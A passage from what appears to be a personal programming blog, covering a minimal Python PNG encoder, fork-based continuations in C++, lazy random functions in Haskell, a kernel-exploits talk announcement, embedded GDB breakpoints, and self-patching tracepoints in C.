We will assume the raw image data is a Python byte string (non-Unicode), consisting of one byte each for red, green, and blue, for each pixel in English reading order. For reference, here is how we'd "encode" this data in the much simpler PPM format.

def to_ppm(width, height, data):
    return 'P6\n%d %d\n255\n%s' % (width, height, data)

I lied when I said we'd use no libraries at all. I will import Python's standard struct module. I figured an exercise in converting integers to 4-byte big endian format would be excessively boring. Here's how we do it with struct.

import struct

def be32(n):
    return struct.pack('>I', n)

A PNG file contains a sequence of data chunks, each with an associated length, type, and CRC checksum. The type is a 4-byte quantity which can be interpreted as four ASCII letters. We'll implement crc later.

def png_chunk(ty, data):
    return be32(len(data)) + ty + data + be32(crc(ty + data))

The IHDR chunk, always the first chunk in a file, contains basic header information such as width and height. We will hardcode a color depth of 8 bits, color type 2 (RGB truecolor), and standard 0 values for the other fields.

def png_header(width, height):
    return png_chunk('IHDR',
        struct.pack('>IIBBBBB', width, height, 8, 2, 0, 0, 0))

The actual image data is stored in DEFLATE format, the same compression used by gzip and friends. Fortunately for our minimalist project, DEFLATE allows uncompressed blocks. Each one has a 5-byte header: the byte 0 (or 1 for the last block), followed by a 16-bit data length, and then the same length value with all of the bits flipped. Note that these are little-endian numbers, unlike the rest of PNG. Never assume a format is internally consistent!

MAX_DEFLATE = 0xffff
def deflate_block(data, last=False):
    n = len(data)
    assert n <= MAX_DEFLATE
    return struct.pack('<BHH', bool(last), n, 0xffff ^ n) + data

Since a DEFLATE block can only hold 64 kB, we'll need to split our image data into multiple blocks. We will actually want a more general function to split a sequence into chunks of size n (allowing the last chunk to be smaller than n).

def pieces(seq, n):
    return [seq[i:i+n] for i in xrange(0, len(seq), n)]

PNG wants the DEFLATE blocks to be encapsulated as a zlib data stream. For our purposes, this means we prefix a header of 78 01 hex, and suffix an Adler-32 checksum of the "decompressed" data. That's right, a self-contained PNG encoder needs to implement two different checksum algorithms.

def zlib_stream(data):
    segments = pieces(data, MAX_DEFLATE)

    blocks = ''.join(deflate_block(p) for p in segments[:-1])
    blocks += deflate_block(segments[-1], last=True)

    return '\x78\x01' + blocks + be32(adler32(data))

We're almost done, but there's one more wrinkle. PNG has a pre-compression filter step, which transforms a scanline of data at a time. A filter doesn't change the size of the image data, but is supposed to expose redundancies, leading to better compression. We aren't compressing anyway, so we choose the no-op filter. This means we prefix a zero byte to each scanline.

At last we can build the PNG file. It consists of the magic PNG signature, a header chunk, our zlib stream inside an IDAT chunk, and an empty IEND chunk to mark the end of the file.

def to_png(width, height, data):
    lines = ''.join('\0'+p for p in pieces(data, 3*width))

    return ('\x89PNG\r\n\x1a\n'
        + png_header(width, height)
        + png_chunk('IDAT', zlib_stream(lines))
        + png_chunk('IEND', ''))

Actually, a PNG file may contain any number of IDAT chunks. The zlib stream is given by the concatenation of their contents. It might be convenient to emit one IDAT chunk per DEFLATE block. But the IDAT boundaries really can occur anywhere, even halfway through the zlib checksum. This flexibility is convenient for encoders, and a hassle for decoders. For example, one of many historical PNG bugs in Internet Explorer is triggered by empty IDAT chunks.

Here are those checksum algorithms we need. My CRC function follows the approach of code fragment 5 from Wikipedia. For better performance you would want to precompute a lookup table, as suggested by the PNG spec.

def crc(data):
    c = 0xffffffff
    for x in data:
        c ^= ord(x)
        for k in xrange(8):
            v = 0xedb88320 if c & 1 else 0
            c = v ^ (c >> 1)
    return c ^ 0xffffffff

def adler32(data):
    s1, s2 = 1, 0
    for x in data:
        s1 = (s1 + ord(x)) % 65521
        s2 = (s2 + s1) % 65521
    return (s2 << 16) + s1

Now we can test this code. We'll generate a grid of red-green-yellow gradients, and write it in both PPM and PNG formats.

w, h = 500, 300
img = ''
for y in xrange(h):
    for x in xrange(w):
        img += chr(x % 256) + chr(y % 256) + '\0'

open('out.ppm', 'wb').write(to_ppm(w, h, img))
open('out.png', 'wb').write(to_png(w, h, img))

Then we can verify that the two files contain identical image data.

$ pngtopnm out.png | sha1sum - out.ppm
e19c1229221c608b2a45a4488f9959403b8630a0  -
e19c1229221c608b2a45a4488f9959403b8630a0  out.ppm

That's it! As usual, the code is on GitHub. You can also read what others have written on similar subjects here, here, here, or here.

Continuations in C++ with fork

2012-02-14T01:26:00.000-08:00

[Update, Jan 2015: I've translated this code into Rust.]

While reading "Continuations in C" I came across an intriguing idea:

It is possible to simulate call/cc, or something like it, on Unix systems with system calls like fork() that literally duplicate the running process.

The author sets this idea aside, and instead discusses some code that uses setjmp/longjmp and stack copying. And there are several other continuation-like constructs available for C, such as POSIX getcontext. But the idea of implementing call/cc with fork stuck with me, if only for its amusement value. I'd seen fork used for computing with probability distributions, but I couldn't find an implementation of call/cc itself. So I decided to give it a shot, using my favorite esolang, C++.

Continuations are a famously mind-bending idea, and this article doesn't totally explain what they are or what they're good for. If you aren't familiar with continuations, you might catch on from the examples, or you might want to consult another source first (1, 2, 3, 4, 5, 6).

Small examples

I'll get to the implementation later, but right now let's see what these fork-based continuations can do. The interface looks like this.

template <typename T>
class cont {
public:
    void operator()(const T &x);
};

template <typename T>
T call_cc( std::function< T (cont<T>) > f );

std::function is a wrapper that can hold function-like values, such as function objects or C-style function pointers. So call_cc<T> will accept any function-like value that takes an argument of type cont<T> and returns a value of type T. This wrapper is the first of several C++11 features we'll use.

call_cc stands for "call with current continuation", and that's exactly what it does. call_cc(f) will call f, and return whatever f returns. The interesting part is that it passes to f an instance of our cont class, which represents all the stuff that's going to happen in the program after f returns. That cont object overloads operator() and so can be called like a function. If it's called with some argument x, the program behaves as though f had returned x.

The types reflect this usage. The type parameter T in cont<T> is the return type of the function passed to call_cc. It's also the type of values accepted by cont<T>::operator().

Here's a small example.

int f(cont<int> k) {
    std::cout << "f called" << std::endl;
    k(1);
    std::cout << "k returns" << std::endl;
    return 0;
}

int main() {
    std::cout << "f returns " << call_cc<int>(f) << std::endl;
}

When we run this code we get:

f called
f returns 1

We don't see the "k returns" message. Instead, calling k(1) bails out of f early, and forces it to return 1. This would happen even if we passed k to some deeply nested function call, and invoked it there.

This nonlocal return is kind of like throwing an exception, and is not that surprising. More exciting things happen if a continuation outlives the function call it came from.

boost::optional< cont<int> > global_k;

int g(cont<int> k) {
    std::cout << "g called" << std::endl;
    global_k = k;
    return 0;
}

int main() {
    std::cout << "g returns " << call_cc<int>(g) << std::endl;

    if (global_k)
        (*global_k)(1);
}

When we run this, we get:

g called
g returns 0
g returns 1

g is called once, and returns twice! When called, g saves the current continuation in a global variable. After g returns, main calls that continuation, and g returns again with a different value.

What value should global_k have before g is called? There's no such thing as a "default" or "uninitialized" cont<T>. We solve this problem by wrapping it with boost::optional. We use the resulting object much like a pointer, checking for "null" and then dereferencing. The difference is that boost::optional manages storage for the underlying value, if any.

Why isn't this code an infinite loop? Because invoking a cont<T> also resets global state to the values it had when the continuation was captured. The second time g returns, global_k has been reset to the "null" optional value. This is unlike Scheme's call/cc and most other continuation systems. It turns out to be a serious limitation, though it's sometimes convenient. The reason for this behavior is that invoking a continuation is implemented as a transfer of control to another process. More on that later.

Backtracking

We can use continuations to implement backtracking, as found in logic programming languages. Here is a suitable interface.

bool guess();
void fail();

We will use guess as though it has a magical ability to predict the future. We assume it will only return true if doing so results in a program that never calls fail. Here is the implementation.

boost::optional< cont<bool> > checkpoint;

bool guess() {
    return call_cc<bool>( [](cont<bool> k) {
        checkpoint = k;
        return true;
    } );
}

void fail() {
    if (checkpoint) {
        (*checkpoint)(false);
    } else {
        std::cerr << "Nothing to be done." << std::endl;
        exit(1);
    }
}

guess invokes call_cc on a lambda expression, which saves the current continuation and returns true. A subsequent call to fail will invoke this continuation, retrying execution in a world where guess had returned false instead. In Scheme et al, we would store a whole stack of continuations. But invoking our cont<bool> resets global state, including the checkpoint variable itself, so we only need to explicitly track the most recent continuation.

Now we can implement the integer factoring example from "Continuations in C".

int integer(int m, int n) {
    for (int i=m; i<=n; i++) {
        if (guess())
            return i;
    }
    fail();
}

void factor(int n) {
    const int i = integer(2, 100);
    const int j = integer(2, 100);

    if (i*j != n)
        fail();

    std::cout << i << " * " << j << " = " << n << std::endl;
}

factor(n) will guess two integers, and fail if their product is not n. Calling factor(391) will produce the output

17 * 23 = 391

after a moment's delay. In fact, you might see this after your shell prompt has returned, because the output is produced by a thousand-generation descendant of the process your shell created.

Solving a maze

For a more substantial use of backtracking, let's solve a maze.

const int maze_size = 15;
char maze[] =
    "X-------------+\n"
    "        |     |\n"
    "|--+  | |   | |\n"
    "|  |  | | --+ |\n"
    "|     |     | |\n"
    "|-+---+--+- | |\n"
    "| |      |    |\n"
    "| | | ---+-+- |\n"
    "|   |      |  |\n"
    "| +-+-+--|    |\n"
    "| |   |  |--- |\n"
    "|     |       |\n"
    "|--- -+-------|\n"
    "|              \n"
    "+------------- \n";

void solve_maze() {
    int x=0, y=0;

    while ((x != maze_size-1)
        || (y != maze_size-1)) {

             if (guess()) x++;
        else if (guess()) x--;
        else if (guess()) y++;
        else              y--;

        if (  (x < 0) || (x >= maze_size) ||
              (y < 0) || (y >= maze_size)  )
            fail();

        const int i = y*(maze_size+1) + x;
        if (maze[i] != ' ')
            fail();
        maze[i] = 'X';
    }

    for (char c : maze) {
        if (c == 'X')
            std::cout << "\e[1;32mX\e[0m";
        else
            std::cout << c;
    }
}

Whether code or prose, the algorithm is pretty simple. Start at the upper-left corner. As long as we haven't reached the lower-right corner, guess a direction to move. Fail if we go off the edge, run into a wall, or find ourselves on a square we already visited.

Once we've reached the goal, we iterate over the char array and print it out with some rad ANSI color codes.

Once again, we're making good use of the fact that our continuations reset global state. That's why we see 'X' marks not on the failed detours, but only on a successful path through the maze. Here's what it looks like.


X-------------+
XXXXXXXX|     |
|--+  |X|   | |
|  |  |X| --+ |
|     |XXXXX| |
|-+---+--+-X| |
| |XXX   | XXX|
| |X|X---+-+-X|
|XXX|XXXXXX|XX|
|X+-+-+--|XXX |
|X|   |  |--- |
|XXXX |       |
|---X-+-------|
|   XXXXXXXXXXX
+-------------X

Excess backtracking

We can run both examples in a single program.

int main() {
    factor(391);
    solve_maze();
}

If we change the maze to be unsolvable, we'll get:

17 * 23 = 391
23 * 17 = 391
Nothing to be done.

Factoring 391 a different way won't change the maze layout, but the program doesn't know that. We can add a cut primitive to eliminate unwanted backtracking.

void cut() {
    checkpoint = boost::none;
}

int main() {
    factor(391);
    cut();
    solve_maze();
}

The implementation

For such a crazy idea, the code to implement call_cc with fork is actually pretty reasonable. Here's the core of it.

template <typename T>
// static
T cont<T>::call_cc(call_cc_arg f) {
    int fd[2];
    pipe(fd);
    int read_fd  = fd[0];
    int write_fd = fd[1];

    if (fork()) {
        // parent
        close(read_fd);
        return f( cont<T>(write_fd) );
    } else {
        // child
        close(write_fd);
        char buf[sizeof(T)];
        if (read(read_fd, buf, sizeof(T)) < ssize_t(sizeof(T)))
            exit(0);
        close(read_fd);
        return *reinterpret_cast<T*>(buf);
    }
}

template <typename T>
void cont<T>::impl::invoke(const T &x) {
    write(m_pipe, &x, sizeof(T));
    exit(0);
}

To capture a continuation, we fork the process. The resulting processes share a pipe which was created before the fork. The parent process will call f immediately, passing a cont<T> object that holds onto the write end of this pipe. If that continuation is invoked with some argument x, the parent process will send x down the pipe and then exit. The child process wakes up from its read call, and returns x from call_cc.

There are a few more implementation details.

If the parent process exits, it will close the write end of the pipe, and the child's read will return 0, i.e. end-of-file. This prevents a buildup of unused continuation processes. But what if the parent deletes the last copy of some cont<T>, yet keeps running? We'd like to kill the corresponding child process immediately.

This sounds like a use for a reference-counted smart pointer, but we want to hide this detail from the user. So we split off a private implementation class, cont<T>::impl, with a destructor that calls close. The user-facing class cont<T> holds a std::shared_ptr to a cont<T>::impl. And cont<T>::operator() simply calls cont<T>::impl::invoke through this pointer.
It would be nice to tell the compiler that cont<T>::operator() won't return, to avoid warnings like "control reaches end of non-void function". GCC provides the noreturn attribute for this purpose.
We want the cont<T> constructor to be private, so we had to make call_cc a static member function of that class. But the examples above use a free function call_cc<T>. It's easiest to implement the latter as a 1-line function that calls the former. The alternative is to make it a friend function of cont<T>, which requires some forward declarations and other noise.

There are a number of limitations too.

As noted, the forked child process doesn't see changes to the parent's global state. This precludes some interesting uses of continuations, like implementing coroutines. In fact, I had trouble coming up with any application other than backtracking. You could work around this limitation with shared memory, but it seemed like too much hassle.
Each captured continuation can only be invoked once. This is easiest to observe if the code using continuations also invokes fork directly. It could possibly be fixed with additional forking inside call_cc.
Calling a continuation sends the argument through a pipe using a naive byte-for-byte copy. So the argument needs to be Plain Old Data, and had better not contain pointers to anything not shared by the two processes. This means we can't send continuations through other continuations, sad to say.
I left out the error handling you would expect in serious code, because this is anything but.
Likewise, I'm assuming that a single write and read will suffice to send the value. Robust code will need to loop until completion, handle EINTR, etc. Or use some higher-level IPC mechanism.
At some size, stack-allocating the receive buffer will become a problem.
It's slow. Well, actually, I'm impressed with the speed of fork on Linux. My machine solves both backtracking problems in about a second, forking about 2000 processes along the way. You can speed it up more with static linking. But it's still far more overhead than the alternatives.

As usual, you can get the code from GitHub.

Generating random functions

2012-02-02T13:24:00.000-08:00

How can we pick a random Haskell function? Specifically, we want to write an IO action

randomFunction :: IO (Integer -> Bool)

with this behavior:

It produces a function of type Integer -> Bool.
It always produces a total function — a function which never throws an exception or enters an infinite loop.
It is equally likely to produce any such function.

This is tricky, because there are infinitely many such functions (more on that later).

In another language we might produce something which looks like a function, but actually flips a coin on each new integer input. It would use mutable state to remember previous results, so that future calls will be consistent. But the Haskell type we gave for randomFunction forbids this approach. randomFunction uses IO effects to pick a random function, but the function it picks has access to neither coin flips nor mutable state.

Alternatively, we could build a lazy infinite data structure containing all the Bool answers we need. randomFunction could generate an infinite list of random Bools, and produce a function f which indexes into that list. But this indexing will be inefficient in space and time. If the user calls (f 10000000), we'll have to run 10,000,000 steps of the pseudo-random number generator, and build 10,000,000 list elements, before we can return a single Bool result.

We can improve this considerably by using a different infinite data structure. Though our solution is pure functional code, we do end up relying on mutation — the implicit mutation by which lazy thunks become evaluated data.

The data structure

import System.Random
import Data.List ( genericIndex )

Our data structure is an infinite binary tree:

data Tree = Node Bool Tree Tree

We can interpret such a tree as a function from non-negative Integers to Bools. If the Integer argument is zero, the root node holds our Bool answer. Otherwise, we shift off the least-significant bit of the argument, and look at the left or right subtree depending on that bit.

get :: Tree -> (Integer -> Bool)
get (Node b _ _) 0 = b
get (Node _ x y) n =
    case divMod n 2 of
        (m, 0) -> get x m
        (m, _) -> get y m

Now we need to build a suitable tree, starting from a random number generator state. The standard System.Random module is not going to win any speed contests, but it does have one extremely nice property: it supports an operation

split :: StdGen -> (StdGen, StdGen)

The two generator states returned by split will (ideally) produce two independent streams of random values. We use split at each node of the infinite tree.

build :: StdGen -> Tree
build g0 =
    let (b,  g1) = random g0
        (g2, g3) = split  g1
    in  Node b (build g2) (build g3)

This is a recursive function with no base case. Conceptually, it produces an infinite tree. Operationally, it produces a single Node constructor, whose fields are lazily-deferred computations. As get explores this notional infinite tree, new Nodes are created and randomness generated on demand.

get traverses one level per bit of its input integer. So looking up the integer n involves traversing and possibly creating O(log n) nodes. This suggests good space and time efficiency, though only testing will say for sure.

Now we have all the pieces to solve the original puzzle. We build two trees, one to handle positive numbers and another for negative numbers.

randomFunction :: IO (Integer -> Bool)
randomFunction = do
    neg <- build `fmap` newStdGen
    pos <- build `fmap` newStdGen
    let f n | n < 0     = get neg (-n)
            | otherwise = get pos n
    return f

Testing

Here's some code which helps us visualize one of these functions in the vicinity of zero:

test :: (Integer -> Bool) -> IO ()
test f = putStrLn $ map (char . f) [-40..40] where
    char False = ' '
    char True  = '-'

Now we can test randomFunction in GHCi:

λ> randomFunction >>= test
---- -   ---   -    - -   - --   - - -  -- --- -- --          - -- - - --  --- --
λ> randomFunction >>= test
-   ---- - - - -  - - -- -   -     ---  --- -- - --  -  --    - -  - - -  --   - 
λ> randomFunction >>= test
- ---  - - -  --  ---         -  --  -  -    -  -  - ---- - -  ---   -     -    -

Each result from randomFunction is indeed a function: it always gives the same output for a given input. This much should be clear from the fact that we haven't used any unsafe shenanigans. But we can also demonstrate it empirically:

λ> f <- randomFunction
λ> test f
-   -----  - -   -- - -   --- --  - -   - -   - -   -- - -   ---- - - - -  - --- 
λ> test f
-   -----  - -   -- - -   --- --  - -   - -   - -   -- - -   ---- - - - -  - ---

Let's also test the speed on some very large arguments:

λ> :set +s
λ> f 10000000
True
(0.03 secs, 12648232 bytes)
λ> f (2^65536)
True
(1.10 secs, 569231584 bytes)
λ> f (2^65536)
True
(0.26 secs, 426068040 bytes)

The second call with 2^65536 is faster because the tree nodes already exist in memory. We can expect our tests to be faster yet if we compile with ghc -O rather than using GHCi's bytecode interpreter.

How many functions?

Assume we have infinite memory, so that Integers really can be unboundedly large. And let's ignore negative numbers, for simplicity. How many total functions of type Integer -> Bool are there?

Suppose we made an infinite list xs of all such functions. Now consider this definition:

diag :: [Integer -> Bool] -> (Integer -> Bool)
diag xs n = not $ genericIndex xs n n

For an argument n, diag xs looks at what the nth function of xs would return, and returns the opposite. This means the function diag xs differs from every function in our supposedly comprehensive list of functions. This contradiction shows that there are uncountably many total functions of type Integer -> Bool. It's closely related to Cantor's diagonal argument that the real numbers are uncountable.

But wait, there are only countably many Haskell programs! In fact, you can encode each one as a number. There may be uncountably many functions, but there are only a countable number of computable functions. So the proof breaks down if you restrict it to a real programming language like Haskell.

In that context, the existence of xs implies that there is some algorithm to enumerate the computable total functions. This is the assumption we ultimately contradict. The set of computable total functions is not recursively enumerable, even though it is countable. Intuitively, to produce a single element of this set, we would have to verify that the function halts on every input, which is impossible in the general case.

Now let's revisit randomFunction. Any function it produces is computable: the algorithm is a combination of the pseudo-random number procedure and our tree traversal. In this sense, randomFunction provides extremely poor randomness; it only selects values from a particular measure zero subset of its result type! But if you read the type constructor (->) as "computable function", as one should in a programming language, then randomFunction is closer to doing what it says it does.

Edit: See also Luke Palmer's recent article on this subject.

Writing kernel exploits

2012-01-28T09:02:00.000-08:00

Yesterday I gave a talk about writing kernel exploits. I've posted the slides [PDF]. Here is the original description:

Did you know that a NULL pointer can compromise your entire system? Do you know how UNIX pipes, multithreading, and an obscure network protocol from 1981 are combined to take over Linux machines today? OS kernels are full of strange and interesting vulnerabilities, thanks to the subtle nature of systems code. And the kernel's ultimate authority is the ultimate prize for an attacker.

In this talk you will learn how kernel exploits work, with detailed code examples. Compared to userspace, exploiting the kernel requires a whole different bag of tricks, and we'll cover some of the most important ones. We will focus on Linux systems and x86 hardware, though most ideas will generalize. We'll start with a few toy examples, then look at some real, high-profile Linux exploits from the past two years.

You will also see how to protect your own Linux machines against kernel exploits. We'll talk about the continual cat-and-mouse game between system administrators and those who would attack even hardened kernels.

Thanks again to SIPB for giving me a venue to talk about whatever I find interesting.

Embedding GDB breakpoints in C source code

2012-01-19T09:51:00.000-08:00

Have you ever wanted to embed GDB breakpoints in C source code?

int main() {
    printf("Hello,\n");
    EMBED_BREAKPOINT;
    printf("world!\n");
    EMBED_BREAKPOINT;
    return 0;
}

One way is to directly insert your CPU's breakpoint instruction. On x86:

#define EMBED_BREAKPOINT  asm volatile ("int3;")

There are at least two problems with this approach:

They aren't real GDB breakpoints. You can't disable them, count how many times they've been hit, etc.
If you run the program outside GDB, the breakpoint instruction will crash your process.

Here is a small hack which solves both problems:

#define EMBED_BREAKPOINT \
    asm("0:"                              \
        ".pushsection embed-breakpoints;" \
        ".quad 0b;"                       \
        ".popsection;")

We place a local label into the instruction stream, and then save its address in the embed-breakpoints linker section.

Then we need to convert these addresses into GDB breakpoint commands. I wrote a tool that does this, as a wrapper for the gdb command. Here's how it works, on our initial example:

$ gcc -g -o example example.c

$ ./gdb-with-breakpoints ./example
Reading symbols from example...done.
Breakpoint 1 at 0x4004f2: file example.c, line 8.
Breakpoint 2 at 0x4004fc: file example.c, line 10.
(gdb) run
Starting program: example 
Hello,

Breakpoint 1, main () at example.c:8
8           printf("world!\n");
(gdb) info breakpoints
Num     Type           Disp Enb Address            What
1       breakpoint     keep y   0x00000000004004f2 in main at example.c:8
        breakpoint already hit 1 time
2       breakpoint     keep y   0x00000000004004fc in main at example.c:10

If we run the program normally, or in GDB without the wrapper, the EMBED_BREAKPOINT statements do nothing. The breakpoint addresses aren't even loaded into memory, because the embed-breakpoints section is not marked as allocatable.

You can find all of the code on GitHub under a BSD license. I've done only minimal testing, but I hope it will be a useful debugging tool for someone. Let me know if you find any bugs or improvements. You can comment here, or find my email address on GitHub.

I'm not sure about the decision to write the GDB wrapper in C using BFD. I also considered Haskell and elf, or Python and the new pyelftools. One can probably do something nicer using the GDB Python API, which was added a few years ago.

This code depends on a GNU toolchain: it uses GNU C extensions, GNU assembler syntax, and BFD. The GDB wrapper uses the Linux proc filesystem, so that it can pass to GDB a temporary file which has already been unlinked. You could port it to other UNIX systems by changing the tempfile handling. It should work on a variety of CPU architectures, but I've only tested it on 32- and 64-bit x86.

Zombie 6.001 starts tomorrow!

2012-01-09T22:41:00.000-08:00

The student-run revival of MIT's famous intro CS class starts tomorrow! 6.001 and its text SICP had a singular influence on the teaching of introductions to computer science — not to be confused with intro to programming, worthwhile though that subject may be. After the unfortunate demise of 6.001 at MIT, some former TAs reanimated the class as an intense four-week experience. As their description says:

Zombie-like, 6.001 rises from the dead to threaten students again. Unlike a zombie, though, it's moving quite a bit faster than it did the first time. Like the original, don't walk into the class expecting that it will teach you Scheme; instead, it attempts to teach thought patterns for computer science, and the structure and interpretation of computer programs. Three projects will be assigned and graded. Prereq: some programming experience; high confusion threshold.

I'm helping teach it this year, and it should be a lot of fun. You can follow along online or if you're in the area, come to lectures Tuesdays and Thursdays, 19:00 to 21:00 in 32-044 (that's MIT building 32, room 044).

Propane: Functional synthesis of images and animations in Haskell

2011-12-21T16:59:00.000-08:00

I just released Propane, a Haskell libary for functional synthesis of images and animations. This is a generalization of my Repa-based quasicrystal code.

It's based on the same ideas as Pan and some other projects. An image is a function assigning a color to each point in the plane. Similarly, an animation assigns an image to each point in time. Haskell's tools for functional and declarative programming can be used directly on images and animations.

For example, you can draw a red-green gradient like so:

import Propane

main = saveImage "out.png" (Size 400 400) im where
    im (x,y) = cRGB (unbal x) (unbal y) 0

Here im is the image as a function, mapping an (x,y) coordinate to a color. unbal is a function provided by Propane, which just maps the interval [-1, 1] to [0, 1].

The source package includes an animated quasicrystal and several other examples. Propane uses Repa for data-parallel array computations. That means it automatically uses multiple CPU cores for rendering, provided the program is compiled and run with threads enabled. That said, it's not yet been optimized for speed in other ways.

This is just a toy right now, but do let me know if you come up with cool enhancements or examples!

Self-modifying code for debug tracing in quasi-C

2011-11-07T05:39:00.000-08:00

Printing a program's state as it runs is the simple but effective debugging tool of programmers everywhere. For efficiency, we usually disable the most verbose output in production. But sometimes you need to diagnose a problem in a deployed system. It would be convenient to declare "tracepoints" and enable them at runtime, like so:

tracepoint foo_entry;

int foo(int n) {
  TRACE(foo_entry, "called foo(%d)\n", n);
  // ...
}

// Called from UI, monitoring interface, etc.
void debug_foo() {
  enable(&foo_entry);
}

Here's a simple implementation of this API:

typedef int tracepoint;

#define TRACE(_point, _args...) \
  do {                          \
    if (_point) printf(_args);  \
  } while (0)

static inline void enable(tracepoint *point) {
  *point = 1;
}

Each tracepoint is simply a global variable. The construct do { ... } while (0) is a standard trick to make macro-expanded code play nicely with its surroundings. We also use GCC's syntax for macros with a variable number of arguments.

This approach does introduce a bit of overhead. One concern is that reading a global variable will cause a cache miss and will also evict a line of useful data from the cache. There's also some impact from adding a branch instruction. We'll develop a significantly more complicated implementation which avoids both of these problems.

Our new solution will be specific to x86-64 processors running Linux, though the idea can be ported to other platforms. This approach is inspired by various self-modifying-code schemes in the Linux kernel, such as ftrace, kprobes, immediate values, etc. It's mostly intended as an example of how these tricks work. The code in this article is not production-ready.

The design

Our new TRACE macro will produce code like the following pseudo-assembly:

foo:
    ...
    ; code before tracepoint
    ...
tracepoint:
    nop
after_tracepoint:
    ...
    ; rest of function
    ...
    ret

do_tracepoint:
    push args to printf
    call printf
    jmp after_tracepoint

In the common case, the tracepoint is disabled, and the overhead is only a single nop instruction. To enable the tracepoint, we replace the nop instruction in memory with jmp do_tracepoint.

The `TRACE` macro

Our nop instruction needs to be big enough that we can overwrite it with an unconditional jump. On x86-64, the standard jmp instruction has a 1-byte opcode and a 4-byte signed relative displacement, so we need a 5-byte nop. Five one-byte 0x90 instructions would work, but a single five-byte instruction will consume fewer CPU resources. Finding the best way to do nothing is actually rather difficult, but the Linux kernel has already compiled a list of favorite nops. We'll use this one:

#define NOP5 ".byte 0x0f, 0x1f, 0x44, 0x00, 0x00;"

Let's check this instruction using udcli:

$ echo 0f 1f 44 00 00 | udcli -x -64 -att
0000000000000000 0f1f440000       nop 0x0(%rax,%rax)

GCC's extended inline assembly lets us insert arbitrarily bizarre assembly code into a normal C program. We'll use the asm goto flavor, new in GCC 4.5, so that we can pass C labels into our assembly code. (The tracing use case inspired the asm goto feature, and my macro is adapted from an example in the GCC manual.)

Here's how it looks:

typedef int tracepoint;

#define TRACE(_point, _args...)          \
  do {                                   \
    asm goto (                           \
      "0: " NOP5                         \
      ".pushsection trace_table, \"a\";" \
      ".quad " #_point ", 0b, %l0;"      \
      ".popsection"                      \
      : : : : __lbl_##_point);           \
    if (0) {                             \
      __lbl_##_point: printf(_args);     \
    }                                    \
  } while (0)

We use the stringify and concat macro operators, and rely on the gluing together of adjacent string literals. A call like this:

TRACE(foo_entry, "called foo(%d)\n", n);

will produce the following code:

  do {
    asm goto (
      "0: .byte 0x0f, 0x1f, 0x44, 0x00, 0x00;"
      ".pushsection trace_table, \"a\";"
      ".quad foo_entry, 0b, %l0;"
      ".popsection"
      : : : : __lbl_foo_entry);
    if (0) {
      __lbl_foo_entry: printf("called foo(%d)\n", n);
    }
  } while (0);

Besides emitting the nop instruction, we write three 64-bit values ("quads"). They are, in order:

The address of the tracepoint variable declared by the user. We never actually read or write this variable. We're just using its address as a unique key.
The address of the nop instruction, by way of a local assembler label.
The address of the C label for our printf call, as passed to asm goto.

This is the information we need in order to patch in a jmp at runtime. The .pushsection directive makes the assembler write into the trace_table section without disrupting the normal flow of code and data. The "a" section flag marks these bytes as "allocatable", i.e. something we actually want available at runtime.

We count on GCC's optimizer to notice that the condition 0 is unlikely to be true, and therefore move the if body to the end of the function. It's still considered reachable due to the label passed to asm goto, so it will not fall victim to dead code elimination.

The linker script

We have to collect all of these trace_table records, possibly from multiple source files, and put them somewhere for use by our C code. We'll do this with the following linker script:

SECTIONS {
  trace_table : {
    trace_table_start = .;
    *(trace_table)
    trace_table_end = .;
  }
}

This concatenates all trace_table sections into a single section in the resulting binary. It also provides symbols trace_table_start and trace_table_end at the endpoints of this section.

Memory protection

Linux systems will prevent an application from overwriting its own code, for good security reasons, but we can explicitly override these permissions. Memory permissions are managed per page of memory. There's a correct way to determine the size of a page, but our code is terribly x86-specific anyway, so we'll hardcode the page size of 4096 bytes.

#define PAGE_SIZE 4096
#define PAGE_OF(_addr) ( ((uint64_t) (_addr)) & ~(PAGE_SIZE-1) )

Then we can unprotect an arbitrary region of memory by calling mprotect for the appropriate page(s):

static void unprotect(void *addr, size_t len) {
  uint64_t pg1 = PAGE_OF(addr),
           pg2 = PAGE_OF(addr + len - 1);
  if (mprotect((void *) pg1, pg2 - pg1 + PAGE_SIZE,
               PROT_READ | PROT_EXEC | PROT_WRITE)) {
    perror("mprotect");
    abort();
  }
}

We're calling mprotect on a page which was not obtained from mmap. POSIX does not define this behavior, but Linux specifically allows mprotect on any page except the vsyscall page.

Enabling a tracepoint

Now we need to implement the enable function:

void enable(tracepoint *point);

We will scan through the trace_table records looking for a matching tracepoint pointer. The C struct corresponding to a trace_table record is:

struct trace_desc {
  tracepoint *point;
  void *jump_from;
  void *jump_to;
} __attribute__((packed));

The packed attribute tells GCC not to insert any padding within or after these structs. This ensures that their layout will match the records we produced from assembly. Now we can implement a linear search through this table.

void enable(tracepoint *point) {
  extern struct trace_desc trace_table_start[], trace_table_end[];
  struct trace_desc *desc;
  for (desc = trace_table_start; desc < trace_table_end; desc++) {
    if (desc->point != point)
      continue;

    int64_t offset = (desc->jump_to - desc->jump_from) - 5;
    if ((offset > INT32_MAX) || (offset < INT32_MIN)) {
      fprintf(stderr, "offset too big: %lx\n", offset);
      abort();
    }

    int32_t offset32 = offset;
    unsigned char *dest = desc->jump_from;
    unprotect(dest, 5);
    dest[0] = 0xe9;
    memcpy(dest+1, &offset32, 4);
  }
}

We enable a tracepoint by overwriting its nop with an unconditional jump. The opcode is 0xe9. The operand is a 32-bit displacement, interpreted relative to the instruction after the jump. desc->jump_from points to the beginning of what will be the jump instruction, so we subtract 5 from the displacement. Then we unprotect memory and write the new bytes into place.

That's everything. You can grab all of this code from GitHub, including a simple test program.

Pitfalls

Where to start?

This code is extremely non-portable, relying on details of x86-64, Linux, and specific recent versions of the GNU C compiler and assembler. The idea can be ported to other platforms, with some care. For example, ARM processors require an instruction cache flush after writing to code. Linux on ARM implements the cacheflush system call for this purpose.

Our code is not thread-safe, either. If one thread reaches a nop while it is being overwritten by another thread, the result will surely be a crash or other horrible bug. The Ksplice paper [PDF] discusses how to prevent this, in the context of live-patching the Linux kernel.

Is it worth opening this can of worms in order to improve performance a little? In general, no. Obviously we'd have to measure the performance difference to be sure. But for most projects, concerns of maintainability and avoiding bugs will preclude tricky hacks like this one.

The Linux kernel is under extreme demands for both performance and flexibility. It's part of every application on a huge number of systems, so any small performance improvement has a large aggregate effect. And those systems are incredibly diverse, making it likely that someone will see a large difference. Finally, kernel development will always involve tricky low-level code as a matter of course. The infrastructure is already there to support it — both software infrastructure and knowledgeable developers.

Global locking through StablePtr

2011-11-04T04:22:00.000-07:00

I spoke before of using global locks in Haskell to protect a thread-unsafe C library. And I wrote about a GHC bug which breaks the most straightforward way to get a global lock.

